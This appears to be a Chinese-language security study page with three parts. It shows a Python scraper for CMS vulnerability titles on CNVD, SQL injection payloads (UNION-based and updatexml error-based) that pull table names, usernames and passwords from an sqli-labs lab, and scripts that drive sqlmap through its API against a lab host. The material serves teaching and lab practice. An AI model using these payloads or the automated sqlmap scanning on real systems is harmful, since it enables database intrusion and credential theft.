获取该网站漏洞列表,关于CMS

image.png

打开burpsuie

image.png

打开(搜索到cms结果页面的)要爬取页面

image.png

开启intercept,重新加载网页

image.png

多点几个下一页,观察burpsuite

image.png
image.png
image.png

发现post请求原数据为

这个样子

  1. POST /flaw/list.htm?flag=true HTTP/1.1
  2. Host: www.cnvd.org.cn
  3. Connection: close
  4. Content-Length: 385
  5. Cache-Control: max-age=0
  6. Origin: https://www.cnvd.org.cn
  7. Upgrade-Insecure-Requests: 1
  8. Content-Type: application/x-www-form-urlencoded
  9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
  11. Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.9
  14. Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946
  15. number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate
  16. =&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&
  17. baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope
  18. =-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&
  19. positionIdStr=&max=20&offset='''

查看网页源码找规律

image.png

利用正则表达式找到a标签下的href标签

获取第一页所有漏洞列表
循环获取前5页的漏洞列表

  1. # -*-coding:utf-8-*-
  2. import hackhttp
  3. from bs4 import BeautifulSoup as BS
  4. import re
  5. def CMS(raw):
  6. url = 'https://www.cnvd.org.cn/flaw/list.htm?flag=true'
  7. hh = hackhttp.hackhttp()
  8. code, head, html, redirect_url, log = hh.http(url=url, raw=raw)
  9. # print code
  10. # print html
  11. soup = BS(html, 'lxml')
  12. CMS_html = soup.body
  13. # print CMS_html
  14. CMS_BUGS = BS(str(CMS_html), 'lxml')
  15. # print CMS_BUGS
  16. BUGS = CMS_BUGS.find_all(name='a', attrs={'href': re.compile('/flaw/show/CNVD-.*?')})
  17. for BUG in BUGS:
  18. print BUG['title']
  19. raw_start = '''
  20. POST /flaw/list.htm?flag=true HTTP/1.1
  21. Host: www.cnvd.org.cn
  22. Connection: close
  23. Content-Length: 385
  24. Cache-Control: max-age=0
  25. Origin: https://www.cnvd.org.cn
  26. Upgrade-Insecure-Requests: 1
  27. Content-Type: application/x-www-form-urlencoded
  28. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
  29. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
  30. Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
  31. Accept-Encoding: gzip, deflate
  32. Accept-Language: zh-CN,zh;q=0.9
  33. Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946
  34. number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate=&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope=-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&positionIdStr=&max=20&offset='''
  35. for pages_count in range(0, 101, 20):#表示[0,100],每循环一次,加上20
  36. raw = raw_start + str(pages_count)
  37. # print raw
  38. CMS(raw)

sql注入实例教学

sql注入

  1. 数字型注入
  2. 1 or 1=1 -- 1
  3. 1 or 1=1 #
  4. 字符型注入
  5. 1' o 1=1 -- 1
  6. 1' o 1=1 #
  7. 基于联合查询的注入
  8. 1. 通过联合查询,确定列数
  9. select id,username from users union select 1,2;
  10. 2. 通过联合查询,获取当前数据库名以及版本
  11. select id,username from users union select database(),version();
  12. 3. 利用内置数据库information_schema中的TABLES表获取指定数据库的所有表名
  13. select id,username from users where id=-1 union select TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security';
  14. 4. 利用内置数据库information_schema中的COLUMN_NAME表获取的对应表的列名
  15. select id,username from users where id=-1 union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users';
  16. 5. 获取对应表的数据
  17. select id,username from users where id=-1 union select id,username from users;
  18. 获取表信息
  19. http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security' limit 3,1; -- 1
  20. 获取列信息
  21. http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users' limit 0,1; -- 1
  22. 获取表数据
  23. http://127.0.0.1/sqli/Less-2/?id=100 union select id,username,password from users; -- 1
  24. 基于函数报错的注入
  25. and updatexml(1,version(),0)#
  26. 完整显示版本名
  27. and updatexml(1,concat(0x7e,version()),0)
  28. 获取表名
  29. and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0)
  30. ERROR 1242 (21000): Subquery returns more than 1 row
  31. 获取表名
  32. and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0)
  33. 获取列表
  34. and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1)),0)#
  35. 获取数据
  36. and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#
  37. and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#
  38. 更多的请查看sql注入闯关游戏文档

sql注入.pdf

深入了解SQLMAP API

geturl.py

  1. #coding=utf-8
  2. from bs4 import BeautifulSoup
  3. import hackhttp
  4. # 1. 定义url, 访问url,获取html内容
  5. url = "http://192.168.131.149/sqli/"
  6. hh = hackhttp.hackhttp()
  7. code, head, html, redirect_url, log = hh.http(url)
  8. # 2. 解析html内容, 使用lxml解析器
  9. soup = BeautifulSoup(html, "lxml");
  10. content = soup.find_all('map',id='fm_imagemap') #尝试获取节点,因为calss和关键字冲突,所以改名class_
  11. print content
  12. # 3. 从解析的网页对象中获取对应的内容
  13. for k in soup.find_all('area'):#,找到div并且classpl2的标签
  14. print(url+ k['href'] + '?id=1') #取第一组的span中的字符串

autosqli.py

  1. #coding=utf-8
  2. import requests
  3. import json
  4. logo = "======auto sqli tools====== "
  5. print(logo)
  6. def sqlmap(host):
  7. urlnew="http://127.0.0.1:8775/task/new"
  8. urlscan="http://127.0.0.1:8775/scan/"
  9. headers={"user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"}
  10. # 创建一个新任务
  11. pd=requests.get(url=urlnew,headers=headers)
  12. print('[*]New task')
  13. # 获取返回的json数据,读取taskid
  14. jsons=pd.json()
  15. print("[*]id:",jsons['taskid'])
  16. print("[*]success:",jsons["success"])
  17. id=jsons['taskid']
  18. # 使用taskid以及要扫描的url,构建数据
  19. scan=urlscan+id+"/start"
  20. print("[*]scanurl:",scan)
  21. data=json.dumps({"url":"{}".format(host)})
  22. headerss={"Content-Type":"application/json"}
  23. # 向sqlmapapi服务器发出请求,等到扫描结果
  24. scans=requests.post(url=scan,headers=headerss,data=data)
  25. # 获取扫描状态
  26. swq=scans.json()
  27. print('--------scan-----------')
  28. print('[*]scanid:',swq["engineid"])
  29. print('[*]scansuccess:',swq["success"])
  30. print('--------status---------')
  31. status="http://127.0.0.1:8775/scan/{}/status".format(id)
  32. print(status)
  33. # 循环等待扫描结果
  34. while True:
  35. ret=requests.get(url=status,headers=headers)
  36. # 当 status = terminated 即为扫描结束
  37. if ret.json()['status'] == 'terminated':
  38. # 获取扫描结果
  39. datas=requests.get(url='http://127.0.0.1:8775/scan/{}/data'.format(id))
  40. dat=datas.json()['data']
  41. print('[*]data:',dat)
  42. break
  43. elif ret.json()['status'] == 'running':
  44. continue
  45. sqlmap("http://192.168.131.149/sqli/Less-1/?id=1")

https://www.freebuf.com/articles/web/204875.html
深入了解SQLMAP API.pdf

相关命令:

  1. python sqlmapapi.py -s
  1. python sqlmapapi.py -c